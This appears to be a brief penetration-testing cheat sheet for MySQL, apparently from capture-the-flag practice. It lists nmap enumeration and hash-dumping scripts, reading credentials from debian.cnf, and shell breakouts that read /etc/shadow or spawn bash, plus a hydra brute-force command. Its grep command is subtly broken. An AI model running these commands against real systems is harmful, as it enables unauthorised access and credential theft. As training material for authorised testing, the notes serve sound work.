MySQL

db, enum

Ports #

Gathering Information from outside #

# nmap
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.166.72

Authentication #

# extracting creds from files
cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" | grep -v "mysql_native_password"

Gathering infor inside SQL shell #

; Checks version
select @@version;

; Checks user
select user();

; checks permissions and privileges
show grants for 'root'@'localhost';	

Privesc #

; Breaks out from shell
\! cat /etc/passwd
\! cat /etc/shadow
\! bash

Files and directories #

# settings
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"

Brute Force #

# mysql over ssh tunnel
hydra -V -L users.txt -P passwords.txt 127.0.0.1 -s 9000 mysql

Exploits #

Other resources #